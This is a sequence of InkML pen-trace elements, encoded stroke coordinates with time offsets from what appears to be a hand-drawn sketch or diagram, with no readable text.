  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-103635.7">23720 6615 0,'-40'0'31,"-39"0"-15,26 0-16,-146 13 15,1 0 1,0-13 0,26 0-1,-14 0 1,-38 0 0,171 0-16,-133 0 15,120 0-15,-132 0 16,26 0-1,40 0 1,-1 0 0,14 0-1,27 0 17,52 0-32,-66 0 15,-53 0 1,120 0-16,-67 0 15,0 0 1,-13 0 0,40-26-1,65 26-15,-52 0 16,13-27 0,-26 14-1,13-14 1,13 14-1,13 0 1,27 0 0,0 0-1,-27-27 17,13-13-17,14 13 1,0-26-1,13 53-15,0-80 16,0 14 0,0-67-1,0 1 1,66 39 0,-26 13-1,-27 80-15,40-66 16,13 39-1,-26 0 1,26-13 0,13 14 15,14-41-15,-67 54-16,93-53 15,80-14 1,-80 27-1,13-14 1,-52 54 0,-41 13-1,-25 13 1,131 0 0,265 106-1,80 39 1,-93-65-1,-173-54 1,-184-13-16,40-13 16,-54 0 15,-13 0-15,0 0-1,14 0 1,-1 0-1,14 0 1,53 53 0,-1-13-1,133 39 1,-132-52 0,-80-14-1,0-13-15,-13 13 16,27 0-16,12 40 15,14 13 1,0-13 0,0 13-1,-13-13 1,-27-26 0,13 13-1,14 12 1,-13 1-1,-14-13 1,0 13 0,-13 26-1,0-52-15,0-14 0,0 27 16,-13 132 0,13-159-1,0 0 1,0 0-1,0 14 1,-13-27-16,-14 40 16,1-1-1,12-12 17,-12-14-17,26 0 1,-13-13-1,0 0-15,-1 0 16,-12 27 0,-1-14-1,14-13 1,-13 26 0,12-26-1,-12 0 1,0 0-1,-14 0 1,13 27 0,14-14-1,-13-13 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="190584.65">5397 7977 0,'-145'0'109,"13"0"-93,79 0-16,-80 0 16,-78 0-1,158 13-15,-132 14 16,13-1 0,13-12-1,0-14 1,-13 0-1,13 0 17,-39 0-17,0 0 1,158 0 0,-26 0-1,26 0 1,0 0-1,27 0-15,-53 0 16,-13 0 0,-40 0-1,52 0 1,1 0 0,40 0-1,-1 0 1,14 0-1,-13 0-15,-27 0 16,-27 0 15,67 0-31,-27 0 16,-12 0 0,-1 0-1,26-14 1,-13-25-1,14-1 1,13 0 0,-27-39-1,27 66-15,0-27 16,-1-39 0,14 26-1,0-13 1,0 26-1,0-40 17,14 28-17,25-1 1,-25 39-16,78-65 16,1 39-1,52-13 1,133 14-1,-238 26-15,105-27 16,-39 13 0,40 14-1,79 13 1,-159 0-16,159 0 16,-159 0-16,93 0 15,132 40 1,-133 0-1,-52-14 1,-40-26 15,-26 0-15,0 0 0,26 0-1,-13 0 1,66 0-1,-40 0 1,-13 0 0,-52 0-16,12 13 15,40 14 1,-26-1 0,52 1-1,1-1 1,26 14 15,-92-27-31,25 0 16,1-13-1,14 0 1,-1 40 0,-53-40-16,40 26 15,-13 1 1,-14-14-1,0 27 1,1-1 0,13 1-1,-27-27 1,0 1 0,0-1-1,0 53 16,1-13 1,-14-40-17,0 27 32,-14-1-31,-52-12-1,13 13 1,-26-1 0,0 1-1,52-40-15,-26 26 16,0-26 0,0 27-1,1-27 16,-15 0 1,28 0-17,-14 0 1,0 0 0,13 0-1,-13 0 1,40 0-1,0 0 142,0 0-142,-1 0 1,1 0 31,0 0-32,0 0-15,-14-13 16,14-14 0,0 14-1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9:17:35.7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9657 8070 0,'-13'0'171,"-27"0"-155,27 26 0,-27 27-1,27-40-15,-13 27 16,13-13 0,-1 12-1,1-12 1,13-14-1,0 40 1,0 0 15,0-40-31,0 27 16,0-1 0,0-12-16,0-1 15,0 1 1,0-1-1,0-13-15,0 1 16,0 25 0,0 1-1,27-14 1,-14 14 0,0 40-1,-13-67-15,0 13 16,13 1-16,0-1 0,1 1 15,12-1 17,-26-13-32,0 1 15,40 25 17,-27-12-17,0-14 1,1 13-1,-1-12-15,-13-1 0,13 0 16,0 0 0,0 27-1,14-27 63,13-13-62,-27 0 15,26 0-15,-25 13 0,25 1-1,-12-14 1,-27 13 15,40-13-15,-27 13-16,40-13 15,0 27 1,0-14 0,-27-13-1,-13 0 1,27 0 15,-14 0-15,-12 0-16,25 0 31,-25 0-15,-1 0 15,40 0-16,-40 0-15,13 0 16,1 0 0,-14 0-1,0 0 1,0 0 0,40-13-1,-39-1 1,12 14-16,14 0 15,-27 0 1,0 0 0,-13-13 15,40-13-15,-14-1-1,1 27 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1806.1">10782 9194 0,'-13'0'156,"-1"0"-140,28-13 77,-1 13-61,13-13-1,-13 13 63,14 0-79,-14 0 1,0 13 0,1 0-1,-1-13 63,-13 40-62,0-27-16,0 14 16,26 12-1,-26-25-15,0-1 0,0 13 31,0-13-15,0 14 0,0-1-1,0-12 1,0 12 0,0-13-1,-13 1 1,13-1-1,-13-13 157,-14-66-156,-12-27 0,25 27-1,14 53 1,0-1-16,-13 1 15,13 0-15,0 0 0,-13 13 266,13-13-250</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="61696.95">10755 5067 0,'-39'26'94,"-28"120"-78,28-67-16,-133 344 15,53-105 1,106-252-16,-27 80 16,-92 145-1,132-252 1,-27 1-16,27-14 0,-13-12 0,0 52 15,13-53-15,0 0 16,0 14-16,-14-14 16,14 0-16,0 0 0,0 1 31,0 12 47</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="62753.49">10821 5913 0,'0'53'47,"-39"53"-32,26-53-15,13 0 0,-14-13 0,1-1 16,0 14-16,-27 80 16,27-28-1,13-25 1,0-54 0,0 1 15,40-1-16,-14-26 1,40 0 15,-53 0-31,93-13 32,-53 0-17,-40-14-15,-13 14 0,14 13 0,12-13 16,-13-80-1,14-13 1,-14 14 0,0 65-16,14-26 15,-27 40-15,0-13 0,13-40 16,-13 52-16,0 1 125,0 26-109,0 40-1,0 40 1,0 39-1,0-92-15,0-27 0,0 53 16,0 27 0,-13-54-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="64586.45">11351 5794 0,'13'106'63,"27"66"-48,-27-145-15,13 131 16,-13 41-1,1-159-15,-14-1 0,13 27 16,0-39-16,-13 52 16,0-52-1,0-14 32,0-53 94,0-13-126,0 40-15,0-27 16,0-39 0,0-14-1,13 67-15,-13 13 0,0-14 16,14-12 0,-14 12-1,0 40 141,0 14-140,0 52 0,0-13-1,0-39-15,0 39 16,0 13 0,0-52-1,0-14-15,0 0 16,-14-13-1,1 27 1,0-14 0,13 0-1,-13-13 63,13 13-62,0-39 78,0-80-79,0 93-15,0-14 16,0-52 0,0 53-16,-27-94 31,27 107-15,0 0-16,0 0 15,0 0 1,0-1-16,0 1 15,0-27 1,0 27-16,0 0 16,0 0-1,27 13 1,-27 13 234,0 0-234,0 0-1,0 1 63,13 12-62</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="65707.12">11800 6112 0,'0'13'63,"0"93"-48,14-13 17,-1-27-17,0-40-15,-13 1 16,0 26-1,0-27-15,0 14 16,27-1 0,-27-25-16,0 25 15,13 1 1,0-14 0,0 14-1,-13-13 1,0-1-1,0-13-15,13 14 16,1 12 0,-14-25-1,0 12-15,13 1 16,-13 25 0,0-12-1,0-13 1,13-14-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="67180.33">11893 6244 0,'26'-40'93,"27"40"-77,-26 0-16,-14 0 0,27 0 16,13 0-1,-27 0 1,1 0 0,-27 14 46,0 118-46,0-119-16,0 14 15,0 12 17,0-25-32,0-1 15,-27 0 1,14-13-16,-14 0 15,1 0 1,26 13 0,-13-13 15,-14 0-15,14 0-16,0 14 125,0-14-110,-14 13 16,14 0-15,0-13-16,-1 0 0,1 0 16,0 0-1,0 0 48,-14 13-48,14 0 1,0-13 0,13 14-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="73820.52">15915 8136 0,'0'0'0,"0"13"0,-27-13 15,-26 0 1,40 0-16,-40 13 16,-26 14-1,52-27-15,-52 13 16,-27 0 0,27-13-1,-1 0 1,-25 0-1,91 0 17,28 0 15,25-13-32,14 0-15,40 13 0,92-40 16,529-39-1,-132 39 1,-158 40 0,-358 0-16,13 0 0,40 0 15,-66 0-15,66 0 16,53 0 0,-145 0-16,12 0 15,-25 0-15,12 0 16,-13 0-1,14-26 17,-14 26-32,14-14 0,-14 14 31,0 0-15,-172 40 30,14-13-30,65-14-16,-171 13 16,-212-26-1,79-13 1,-13-66 0,305 65-16,12 1 15,-65-13-15,105 12 0,-119 1 16,14-13-1,105 26 1,-13-13-16,40 13 16,-13-14-16,-14 14 109,-13 0-93,40 0-16,-14 0 15,14 0 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="108668.37">14909 5543 0,'0'13'94,"0"53"-78,0-39-16,-13 39 15,13-40-15,0 41 16,0-41-16,0 53 15,0 40 1,0-26 0,0-14-1,0 27 17,0-53-17,0-40-15,0 14 16,0-14 156,0 40-157</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="110502.88">15200 5503 0,'14'0'47,"-1"0"-31,0 0 0,13 14-1,-26-1-15,14 40 16,-14-27-16,26 40 15,-13 40 1,-13-40-16,14-26 16,-1 132-16,13-53 15,-26-93 1,14 14 0,-1-13-16,0-14 15,0-13-15,-13 26 16,0-12-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="111946.15">15227 5583 0,'0'-14'78,"0"1"-63,0 0 1,0 0-16,0-14 31,13 14-15,0 13-16,14 0 78,12 0-62,-25 0-1,39 0 1,-27 0 0,14 0-1,-14 0 1,14 0-1,-14 0 17,1 0-17,-14 0 1,13 0 0,-12 0 46,12 27-46,-26 39 15,-13-27-15,0-39-16,13 27 15,-40 13 1,13-14-1,27 0 1,-13-12-16,0-14 16,0 0 31,-14 26-32,1-26 1,-1 27-1,14-14 1,0-13 62,0 0-62,-14 13-1,14 0 1,0-13-16,0 0 16,-27 0-1,40 14-15,-13-14 16,-1 0 31,14 13-32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="-109789.63">10134 4154 0,'-27'-13'31,"-132"0"0,120 13-31,12 0 0,-39-27 16,-132-13-1,158 40-15,-66-26 16,66 13-16,-26 13 16,40 0-16,13 0 0,-40 0 15,-40-14 1,53 14-16,14-13 0,-53 13 15,-120-53 1,27 14 0,53 12-1,66 14 1,40 13 15,-14 0 63,-52 0-78,66 0-16,-14 13 15,27 0-15,-13-13 16,0 14-16,0-14 15,-1 13 1,1-13-16,0 40 16,-40 39-1,40-79-15,0 40 16,-14-14 0,14 1 15,0-14 0,-1 13-15,1-13-16,0 14 15,0-27-15,0 13 0,-1 0 16,14 14 0,-26-14-1,26 0-15,-13 0 16,13 1-1,-40-14 157,13 0-156,1 0-16,13 0 0,-40 0 16,-79-106-1,65 40 1,28 26-1,26 27 1,-1 0 109,-12 66-47,13-40-62,13 0-16,0 0 0,0 0 0,0 14 15,-14 26 1,1-40-16,0 27 16,13-1-1,0 14 1,0-39-16,0 12 16,0 14-1,-13-40-15,13 13 16,-14 13-16,14 14 31,0-27-31,0 40 16,0-26-1,0-14-15,0 0 16,0 14 0,0-14-1,0 66 79,0-26-78,0-40-16,14-13 15,-14 27 1,13-14 15,-13 13 16,26-26-31,-12 14-16,-1-14 0,27 13 15,-14 0-15,27-13 16,40 13-1,-27 1-15,13-14 0,14 26 16,-27-13-16,-13-13 0,119 27 16,-133-27-16,107 0 15,-120 13 1,1-13-16,-1 13 16,-13-13-1,1 13-15,12-13 16,14 14 15,39-14-15,-26 13-1,-40 0-15,67 0 16,52 14 0,14-14-1,12 14 1,-144-27-16,12 0 0,0 13 15,1 0-15,-1-13 16,-12 0-16,25 0 16,1 0-1,-14 0-15,14 0 16,26 0 0,-52 0-1,12 0-15,27 0 16,-40 0-1,0 0-15,14 0 16,-14 0-16,0 0 0,0 0 16,54 0-1,-28 0 1,1 0 0,-27 0-16,40-40 15,27 1 1,-54 39-16,0-27 15,67 1 1,-66-14 0,-14 27-1,0 0 1,0-1 0,0-25 15,1-14-16,-1 39-15,-13-25 16,0-14 0,0 40-1,0-27 1,0 27-16,0-14 16,0-39-1,-13-26 1,-27 25-1,40 54-15,0-13 0,-13-1 16,0 14-16,-1-27 16,-12-13-1,26 40-15,-13 0 0,-14-27 16,-13 1 0,14 12-1,13 1 1,13 12-1,-13 14-15,13-13 16,-14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8:50:18.4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7514 4657 0,'-26'13'94,"-93"13"-78,-27 27-1,14-53 17,13 0-17,0 0 1,-14 13 0,-39 40-1,120-39-15,-134 25 16,-184 54-1,132-53 1,13-40 0,159 0-16,0 0 0,-67 0 15,67 0-15,-185 39 16,-186-25 0,54 12-1,25-26 1,-25 0 15,-120 0 0,450 0-31,-92 26 16,-107-12 0,93-14-1,67 0 1,65 0-16,14 0 0,-26 0 15,12 0 1,-13 0 0,14 0-1,-14 0 1,-39 0 0,-40-27-1,79 14-15,14 0 16,-54-14-16,-52-26 15,26 27 17,80 13-32,12 13 15,1-14 1,13-25 62,0-54-62,0 14-1,0-14 1,0 1 0,0-80-1,0 105 1,13 28-1,-13 26 1,27-1 0,-27-12-16,13 26 0,14-40 15,12-26 1,-12 40-16,-14 26 0,0-27 0,0 1 16,40-40-1,0 26 1,-13 0-1,0 27 1,-27 0-16,0 13 0,53-27 16,14 27-1,25-13 1,-91 13-16,52-13 16,-40 13-16,40-13 15,27-27 1,-67 40-16,133-53 15,26-13 17,-158 66-32,105-40 15,14 0 1,-120 27-16,80 0 16,40-27-1,-120 27-15,14 13 0,52-13 16,27 0-1,27-14 1,-27 14 0,-13 0-1,-27-1 1,-52 1-16,-14 13 16,66-13-16,1-13 15,-14 26 1,-53 0-1,53 0-15,-39 0 16,131 0 0,54 0-1,39 0 1,-26 0 0,-79 0-1,-1 0 1,-92 0-16,66 0 15,80 0 1,-133 0-16,119 0 16,119 39-1,-132-12 1,-66-14 0,-93-13-16,27 0 15,-27 0-15,0 0 16,93 53-1,53 0 17,251-14-17,-119 1 1,-264-40-16,12 13 0,14 1 16,-26-14-1,-14 13 63,0 0-62,14 27 0,-14-40-1,-13 13 16,26 13 1,-12 1-32,-1 39 15,53 53 1,-53-92-16,-13 39 16,27 26-1,-27 1 1,0-80-16,0 40 15,0-27-15,0 54 16,0 65 0,-80-39-1,41-53 1,39-40-16,-14-13 16,1 27-16,13-14 15,-26 0 1,12 0-1,14 1 1,-26-14 109,-27 0-94,13 0-15,14 0 0,-1 0-1,1 0 1,0 0-1,12 0 1,-12 0 0,-1 0-16,14 0 0,0 0 15,-27 0 1,1 0 0,25 0 124,1-14 48</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3583.29">6787 7435 0,'-53'0'31,"13"0"-15,0 0-16,-92-27 15,79 14-15,-132 0 16,132 13-16,-159 0 16,-158 0-1,264 0-15,13-13 0,-105-14 16,-199 14-1,172 13 1,66 0 0,120 0-16,-41 0 15,54 0-15,-80 0 16,-66 0 0,53 0-1,13 0 1,14 0-1,-27 0 17,105 0-32,-25 0 0,-80 0 15,66 0-15,-80-27 16,-65 14 0,13-13-1,39 26 1,107 0-16,-28 0 15,54 0-15,-40 0 16,0 0 0,27 0-1,26-13 48</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6991.53">6271 9922 0,'-40'13'78,"-145"-13"-63,119 0-15,-93 0 16,93 0-16,-146-26 16,133 12-16,-133-12 15,133 13-15,-14-14 16,-39 14-16,-252-40 15,318 53 1,0 0-16,-67 0 16,-105 0-1,185 0-15,-13 0 0,27 0 0,-80 0 16,52 0-16,14 0 0,-66 0 16,-105-13-1,171 0-15,-119 13 16,119 0-16,-66-14 15,79 14-15,13-13 0,-65 0 16,26 13 0,39 0-16,14 0 0,-53 0 15,53 0-15,-14 0 0,14 0 16,-40 0-16,-26 0 16,-40 0-1,39 0 1,67 0-1,-13 0-15,12 0 16,1 0 0,0 0-1,-27 0 32,1 0-31,12 0-1,1 0 1,12 0 0,-25-238 109,12 132-110,1 53-15,-1 0 0,-12-79 16,-54-53 0,67 119-16,-1 13 0,1 0 0,-14-40 15,13 40-15,-25-53 16,25 53-1,27 27 1,0 0 0,0-1-1,0 14 1,0 0 0,397-120 30,-172 67-14,-172 53-32,-27 0 0,27-14 0,-13 27 0,39-26 15,-66 13-15,40 13 16,27 0 0,-14 0-1,0 0 1,13 0-1,14-27-15,-27 27 0,27 0 16,-1 0-16,-52 0 0,0 0 0,26 0 16,-13 0-16,238 0 15,-13 0 1,-225 0-16,13 0 16,26 0-16,-39 0 0,53 0 15,-66 0-15,-14 0 16,27 0-16,66 40 31,40 26-31,132 13 31,-198-39-31,198 53 16,-199-67-16,-12-13 0,78 27 16,-91-40-16,-15 13 0,54 0 15,-79-13-15,-1 0 0,27 0 16,-40 0-1,1 0 1,25 0 47,67 0-48,-27 0 1,27 0-1,-79 0 1,-1 0-16,14 0 0,-14 0 16,1 0-1,-14 14 32,27 91-31,-40-78-16,39 52 15,-12 27 1,-27-79-16,13-14 0,-13 13 16,13 27-16,1 13 15,-14-13 1,0 53 0,0 0-1,0-93-15,-14 14 16,14-1-1,-26 14 1,-1 26 15,1-40-31,0 27 16,-27 27 0,39-80-16,1 26 0,0-13 15,-14 40 1,27-39-1,-13-14 17,-13 26-17,13 0 1,-14 14 0,14-13-1,13-14 1,-13 0-1,-1-13 251,14 13-250,-13 0 15,0 14-15,0-27-16,-1 13 15,-12-13 1,26 13 46,-26 1-46</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12332.79">6456 12700 0,'-40'0'62,"-132"0"-46,-79 0 0,-53 0-1,237 0-15,-131 0 16,-80 0 0,40 0-1,-40 13 1,199-13-1,-199 0-15,199 0 16,-199 0-16,172-13 16,-172-13-1,-119-41 1,199 54 0,79 0-1,106 13-15,-14 0 16,14 0-1,0 0 1,-14 0-16,-26-13 16,-79-1-1,39 14 1,-105-13 0,145 0-16,-26 0 15,65-14 48,1 27-48,13-13-15,-26-13 16,-40-27 0,52 39-16,1 1 0,-27-13 15,27-1-15,-13 1 0,-54-53 16,1-27-1,13 40 1,66 52-16,-13 14 0,-1-26 16,-12 13 31,-14-80-32,14-13 1,13 27-1,13 52 1,0-39-16,-14 13 31,14 40-31,14-13 16,12-27 0,0 13-1,-12 27-15,-1 0 0,0-1 16,14-12-1,-14 26-15,13-13 0,14-14 16,79-39 0,-92 53-16,39-27 15,26 0 1,14 14 0,-79 26-16,39-27 15,13 14 1,-52 0-1,-1 13-15,27-13 0,0 13 0,132-13 32,-26-1-17,13 14 1,-159 0-16,40 0 16,53 0-1,-80 0-15,40 0 16,67 0-1,-14 0 1,26 0 0,-105 0-16,66 14 15,-67-14-15,81 13 16,52 26 0,-53-25-1,-53-1 1,13-13-1,14 0 17,-14 0-32,-66 0 0,27 0 15,119 0 1,-80-13 0,27-14-1,-53 14 1,13 0-1,-53 13-15,14-13 0,12-1 16,1 14-16,198-26 16,-53-14-1,-118 14 1,-28 13 0,1-1-1,-14 1 1,1 13-1,-14 0 17,40 0 46,40 0-63,-54 0 1,-26 0 0,1 0-1,25 0 17,14 66-17,0 40 1,-13-13-1,-27-67 1,-13-13-16,0 1 31,13-1 16,1-13-31,39 39-1,13-25 1,-53-1-16,40 0 16,0 14-1,-40-14 1,13 0 0,-12 14-1,25 12 1,-25-12-16,12 26 15,0 0 1,-12-14 15,-1-26-15,13 54 31,-26-54-32,0 79 1,0-12 0,0-14-1,0-53-15,0 53 16,0 27 0,0-27-1,0-39 1,0-1-1,0 0 17,0-12-32,-13-1 0,0 0 15,0 53 1,-1-26 0,14 0-1,0-1 1,-26 14-1,13-13 1,13-14 0,-13 14-1,-1-13 1,-12-1 0,13 0-1,13-12 1,-14-1-16,1 0 15,13 14 1,-26-1 15,-1-13-15,27 1 0,-13-14 390</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="25599.9">18865 4948 0,'0'-14'47,"-80"-38"-16,-158-54-15,185 92-16,14 1 15,-239-66 17,238 79-32,-145-27 31,172 27-31,0 0 0,-27 0 16,0 0-1,14 0 1,12 0-1,1 0 1,-13 0 0,-1 0-1,14 0-15,0 0 0,-14 0 16,27 14 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27050.05">21907 4842 0,'0'0'0,"0"-13"0,-13-1 0,0 14 16,-40 0-1,-26 0 1,52 0-16,-52 0 15,-186-26 1,173 13-16,39-1 0,0 14 16,-53-26-16,-92 0 15,26 26 1,92 0 0,67 0-16,0 0 15,0 0-15,-1 0 31,-12 0-15,-14 13 15,27 0-15,0-13 31,0 0-32,-27 0 1,0 13 0,27 0-16,0-13 15,-1 14-15,-12-14 16,0 13 0,-14-13-1,13 0 48,-12 0-48,25 0-15,-91 0 16,25 0 0,54 0-1,13 0 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="49267.64">20796 3797 0,'0'-40'0,"-79"27"31,-556 0 63,608 13-94,1 13 15,13-13-15,-622 159 63,582-146-48,13-13-15,-26 0 16,0 0 0,53 0-16,-27 0 15,-26 0 1,13 0 0,-27 0-1,67 13-15,-26 0 16,25-13-16,-12 0 15,13 0-15,-27 0 16,0 0 0,14 0 15,-40 0-15,39 0-1,1 0 1,13 0-1,-14 0 1,14 0-16,-27 0 16,-52 0-1,25 0 1,14 0 0,27 0-1,-27 0 16,-39 0-15,12 0 15,14 14-15,26 12 0,-13 0-1,0-12 1,40-14-16,-13 13 0,-1 13 15,14-26 1,-40 27 0,27-14-1,-1 27 1,27-27-16,-13 27 16,-27 26-1,1 26 1,-1-12-1,27-1 1,13-26 15,0-26-15,0 25 0,0 1-1,0 13 1,0-13-1,26-26 1,-26-14-16,13 14 16,14-14-1,-1 13 1,1-13 0,-14 1-1,27-14 1,-14 13-1,1-13 1,-1 0-16,27 0 31,0 0-15,-27 0-16,14 0 16,26 0-1,-53 0-15,27 0 16,-27 0-16,1-13 0,-1 13 15,13-14 1,-12 14 0,12-13-1,0 13 1,14-26 0,-27 26-16,14 0 15,-1 0-15,27-13 16,-13-1-1,26 14 1,13-26 0,14 26 15,-80 0-31,53 0 16,27 0-1,-27 0 1,0-13-1,-13-1 1,-13 14 0,-27 0-16,0 0 15,27 0 1,26 0 0,0 0-1,-39 0-15,-14 0 16,13 0-1,-12 0 1,-1-26 15,13 26-15,-12-13 0,12-14-1,1 27 1,-14 0 46,0 0-46,13 0-16,54-39 16,-67 25-16,13 14 15,27-13-15,66 0 16,-66 0-1,-13 13 1,-27 0 0,14 0-16,12 0 31,28 0-15,-15 0-1,41 0 1,-27 0-1,-26 0 1,-27 0-16,40 0 16,-40 0-16,14 13 0,12 0 15,54 0 1,-80-13-16,27 0 16,39 27-1,-26-14 1,13-13-1,1 0 1,-15 13 0,41 14 15,-14-14-15,27 0-1,-66-13-15,79 13 16,-40 1-1,-26 12 1,-13-26 0,-14 0-1,41 0 1,-14-13 0,-14 0-1,1-1 1,-14 1-1,14 0 1,-13-14 0,-14 27-1,13-26 1,-13 0 0,1 12-1,-1 1 1,-13 0-16,13 13 47,0-27-32,1-12 1,-1-27 0,-13-40-1,0-13 1,0 66-16,-40-106 15,-66-26 17,67 158-32,-94-105 15,54 66 1,13 39 0,26 1-1,27 26-15,0 0 0,-1 0 16,-12-13-1,-1 0-15,-25 13 16,-54-27 0,26 14-1,-25 13 1,12-13 0,40 13-1,27 0 1,12 0 31,-105 0-16,53 53-15,0-27-1,26 0 1,40-12-1,-13-14-15,13 13 16,-13-13 47,13 13-32,-13 14-16,13-14 1,0 0 31,-14-13 62</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="54165.02">21960 3770 0,'-53'-39'47,"27"39"-31,-53-14-1,-159 1 1,118 13-16,-184 0 16,-40 0-1,133 0 1,118 0 0,14 0-1,-14 0 1,67 0-16,-67 27 15,-13-14 17,13 13-17,-65 1 1,78-14 0,-25-13-1,65 0-15,-40 0 16,-25 0-1,-81 0 1,14 0 0,-13 40-1,0-27 1,132-13-16,-92 0 16,118 0-16,-13 0 0,-39 13 15,-27 0 1,67-13-1,12 0 1,-13 0 0,27 0-1,-40 0 1,0 0 0,27 0-1,-14 0 1,14 0-16,-14 27 15,0-27 1,27 0-16,-40 13 16,40-13-16,0 13 0,-14-13 15,-26 27 1,-13 26 0,-26 39-1,12 14 1,14 0-1,53-80-15,-40 54 16,13 12 0,14-52 15,26 26-15,0-53-16,0 1 0,0 12 15,0 1 1,0-14-16,0 0 0,0 53 31,40-26-15,-14 26-1,0-26 1,-12-27-16,12 0 16,27 40-1,0-26 1,26 12-1,27 1 1,13 0 15,-26-14-31,-67-13 0,14 14 16,13-14 0,119 27-1,13-27 1,-26 0-1,-14-13 1,-118 0-16,-1 0 16,27 0-1,-40 0-15,40 0 16,40 0 0,0-13-1,65-14 1,-78 14-16,65 13 15,-105 0-15,0 0 16,39-26 0,27 26 15,-67 0-15,28 0-1,-41-13-15,53-14 16,-65 14-16,12 13 0,80-13 15,-13 13-15,118-27 16,-78 27 0,12 0-1,-66 0 1,-65-13-16,39 13 16,39 0-1,40 0 1,54 0-1,-1-13 1,-26-27 0,-133 27-1,53-27 1,80-53 0,40 1-1,26-1 1,-67 14-1,-78 13 1,-67 66-16,13-40 16,-26 27-16,27-14 0,-14-12 15,53-54 1,-39 80-16,-1-27 16,-13 0-1,-13 14 1,-26-53-1,-106-14 1,26 14 0,53 26 15,26 40-31,-12-1 16,-1-12-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="55548.02">20042 5450 0,'0'27'63,"0"-1"-48,0 1 1,0 12 15,0-25-15,0 39 0,0-27-1,0 14 1,0-27-1,0 0 79,0 0-78,0 1 109,0-1-110,0 40 1,0-27 0,0-12-16,0 12 15,-13-13 1,13 0 0,-13-13 15,13 27-31,0-1 15,0-12-15,0-1 16,0 13 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="56665.08">19936 6165 0,'0'-13'0,"0"39"187,0 0-171,0-12 15,0 12-15,0-13 15,27-52 109,-27-1-124,13 0 0,0 27 15,-13 0-31,13 13 16,1-13-1,-1 13 1,-13-14 46,13 14 16,-13-26-62,-13-1 0,-27 14 15,27 13-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="58581.84">17211 6509 0,'0'-13'31,"0"-1"-15,0 1-1,-53-13 1,-13 26 0,-212-14-1,120-12 1,52-1 0,66 27-1,0 0 1,14 0-1,-27 0 17,26 0-32,-145 27 31,120-1-15,-1 14-1,13-13 1,0-1-1,-13 27 1,40-53-16,-13 40 16,12 52-1,14-39 1,-13 13 0,13-53-16,0 1 15,0-1-15,0 13 31,0 27-15,0 27 15,40-1 1,-27-66-17,-13 27 1,13-14-1,1 1 1,-1-14-16,0 14 16,0-14-16,27 26 15,0 14 1,-1-26 0,-12-14-1,-27 0-15,26-13 16,-13 14-1,1-14-15,-1 0 16,27 0-16,-27 0 16,13 0-16,40 0 15,1 0 1,12 0 0,-39 0-1,13 0 1,-40 0-16,27 0 15,39-27 1,-13 14 0,-13-14-1,13 1 1,-26 13 0,-27 13-1,13-14 1,41-52 31,12-13-16,-53 53-31,-12-14 16,12 0-1,-13 40 1,14-26-1,-14-1 1,27-39 0,-40 53-16,26-67 15,-26 28 1,13 12 0,-13-13-1,0 13 1,0 27-1,0 0 1,0-14 0,0 14-1,0-13 1,-13-1 0,-26-12-1,-14-14 1,39 53-16,-12-27 15,-40-13 1,13 40 0,-13-13-1,26 13 1,0 0 0,27 0-16,0 0 15,-14 0 1,14 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="61093.54">7858 7342 0,'-13'0'125,"39"-13"-109,-12 0-16,65-1 31,14 14-15,12-26-1,-12 13 1,-67 13-16,41-13 15,25-1 1,-65 14 0,52 0-1,0 0 1,27 0 0,-79 0-16,26 0 0,66 0 15,-13 0 1,-67 0-1,67-13 1,40 13 0,-107 0-1,133 0 1,-106 0-16,146 0 16,0 0-1,-54 0 1,-25 0-1,-120 0-15,66 0 16,1 0 0,-41 0-16,54 0 15,66 0 1,-146 0 0,0 27-16,0-1 15,-13-13 16,53-13 1,40 0-1,224 0-15,14 0-1,-265 0-15,146 0 16,39 0-1,-211 0-15,66 13 16,-40-13 0,13 0-1,27-13 1,53 0 0,13-27-1,-106 27 16,40-13 1,0 26-1,-53 0-15,-40 0-16,40-27 15,13 14 1,13 13-1,14-13 1,-67 13-16,54-13 16,-54 13-16,1 0 0,-14 0 15,13 0 1,1 0 140,-27-14-140,13 14-16,66-13 15,14 13 1,-40 0 0,0 0-1,-40 0 95,40 0 15,-40 0-110,14 0 1,-1 0 31,14 0-32,-27 0-15,0 0 16,1 0-16,-1 0 16,26 0 46,14 0-46,-26 0-16,-1 0 15,-12 0 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="62181.25">14340 6985 0,'40'0'140,"13"0"-124,-13 0-1,-14 0 1,-13 0-16,1 0 16,-1 13 31,13 14-32,-26-14-15,14 27 16,-1-14-1,-13-13 1,0 14 0,0-1 15,-53-13-15,0-13-1,26 0 1,-12 0-1,-14 0 1,26 27 0,1-27 46,-1 0-46,14 0 15,0-66 0,13 39-31,0 1 0,0-80 32</inkml:trace>
